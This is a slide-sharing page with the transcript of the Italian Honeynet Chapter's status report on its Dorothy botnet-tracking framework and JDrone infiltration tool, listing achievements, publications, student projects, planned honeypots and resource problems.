The italian honeynet chapter
This presentation is the property of its rightful owner.
Sponsored Links
1 / 21

The Italian Honeynet Chapter PowerPoint PPT Presentation


  • 80 Views
  • Uploaded on
  • Presentation posted in: General

The Italian Honeynet Chapter. Status Report. Agenda. The Italian HP chapter Goals achieved Ongoing progress Expected goals 3D-Problems Conclusion. The Italian HP Chapter. Founded in 2009 Built around the Dorothy project A framework for tracking botnets

Download Presentation

The Italian Honeynet Chapter

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


The italian honeynet chapter

The Italian Honeynet Chapter

Status Report


Agenda

Agenda

  • The Italian HP chapter

  • Goals achieved

  • Ongoing progress

  • Expected goals

  • 3D-Problems

  • Conclusion


The italian hp chapter

The Italian HP Chapter

  • Founded in 2009

  • Built around the Dorothy project

    • A framework for tracking botnets

  • Currently composed by 4 volounteers

    • Marco Riccardi : R&D Researcher @ Barcelona Digital

    • Marco Cremonini : Assistant Professor @ University of Milan

    • Davide Cavalca : Information Security Advisor , Freelancer

    • Luigi D’Amato : CTO @ Partner Security Lab / Member @ Zone-H


Goals achieved during 2010

Goals achieved during 2010


Goals achieved 1 3

Goals achieved 1/3

  • Java Dorothy Drone Improvement (JDrone)

    • Tool for (IRC) botnet infiltration

    • Totally rewritten in Java

      • totally multiplatform

        • yes, even on windows!

    • Distribuited infrastructure

      • Distribuited drone instances

      • One central Log Server

      • One Authentication server


The jdrone

The JDrone

  • how does it work?


The italian honeynet chapter

C&C #2

C&C #1

C&CIP: 11.11.11.11:6666

Command#1

Command#2

Command#3

JD-Drone

Authentication Server

JD-Drone

C&CIP: 11.11.11.11:6666

Command#1

Command#2

Command#3

JDDrone

Log Server

Dorthy Web GUI


Goals achieved 2 3

Goals achieved 2/3

  • Relationshipformed

    • Telecom Italia, Security Lab (Honeypotimplementation,knoledge sharing)

    • Barcelona Digital (Server hosting, knowledgesharing)

  • Graduatingstudentsupport

    • Fivegraduatingstudents of the Universityof Milan (DTI) are currentlydoingtheir final Thesis on Dorothy related sub-projects.

      • The JDrone Project - Patrizia Martemucci, Andrea Cavenago

      • Botnet Protocol Analysis - Marco Addario – 04/2011

      • Zeus analysis/detection module - Giampaolo Dedola – 02/2011

      • Low-Interaction Honeypot Implementation - Stefano Fornara – Stage in Telecom Italia Labs – 04/2011


Goals achieved 3 3

Goals achieved 3/3

  • Attended confereces

    • Italian Security Summit 2010, Milan, IT

    • inBot 2010, Bonn, DE

    • APWG 2010, Dallas, USA* (paper presented)

  • Two IEEE publications

    • “The Dorothy Project: An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization” - Cremonini M., Riccardi M.

    • “A framework for financial botnet analysis” - Riccardi M., Cremonini M., Oro D.,Vilanova M., Luna J.

  • Awards:

    • Second placed at “Best italian thesis on information security” Clusit 2010

    • “IEEE eCrime Fighters Scholarship Award”, APWG 2010*

      *Paper presented by Barcelona Digital. However the proposed system heavly relies on a customized version of Dorothy.


Ongoing progress

Ongoing progress


Ongoing progress 1 2

Ongoing progress 1/2

  • Porting to Ruby

    • (+ Rails ...I wish..)

  • Porting the virtualization module to VMWare ESXi

  • Testing the first beta of the JDrone

    • any volounteers for betatesting?

  • Compatibility with HTTP botnets (Zeus+SpyEye as first) – For Zeus 1.x almost done


Ongoing progress 2 2

Ongoing progress 2/2

  • Database migration to Postgres - almost done

  • Improving visualization techniques (FlashCharts) – almost done

  • Improving the Web GUI

    • Improving “real time” data visualization (AJAX)

    • Improving its interactiveness

    • ...still waiting to kick off this task 


Future goals

Future Goals

“What are we going to do tonight, Brain?”


Tactical goals

Tactical goals

  • Tool improvements

    • Implement the new Dorothy framework

      • Finish the database implementation

      • Finish the ruby porting phase

      • Finish the new visualization module

      • Execute Dorothy 24hx7d

    • Relase the first beta of the JDRONE

  • Honeypot Implementation

    • Implement at least 10 new low interaction honeypots (dionaea+mwcollectd) among USA, EU, ASIA


Strategic goals

Strategic goals

  • Presentations

    • 2011 – Honeynet Project Annual workshop – Paris (Done!  )

    • Presentation about the JDRone as soon as a stable version is relased

    • …as more than possible!

  • Publications

    • One about data gathered from the new version of the framework (JDrone included)

    • ….others will depend on the development progress

  • Improve relationships

    • Italian/Spanish universities

    • Italian/Spanish CERTS

    • Italian/Spanish LEAs


  • 3d problems

    3D-Problems


    3d problems1

    3D-Problems

    • Resources($)

      • Dorothy needs a big server for its malware analysis module

        • After 3 years, finally we found it! 

    • Time (dT)

      • The big majority of the people involved are currently working for private companies (even the graduating students)...

      • The whole project is totally developed during spare time (very low!) 

    • Space (dS)

      • 4 members, 4 cities, 4 companies, 3 countries

      • Coordination lack

    Slow development 


    Conclusion

    Conclusion

    • Almost two years of development

      • So far so good…

    • Ongoing work

      • Dorothy improvement, second version close to be relased

    • Expectations

      • Clear and concrete goals

    • Problems

      • Our 3D problem vision


    Lets demo

    Lets - Demo!

    • The Dorothy WGUI

    • The JDRone


    Questions

    Questions?


    Thank you

    Thank you

    • marco riccardi

      • [email protected]

      • [email protected]

      • skype: m4rco-

    • Website:

      • www.honeynet.it


  • Login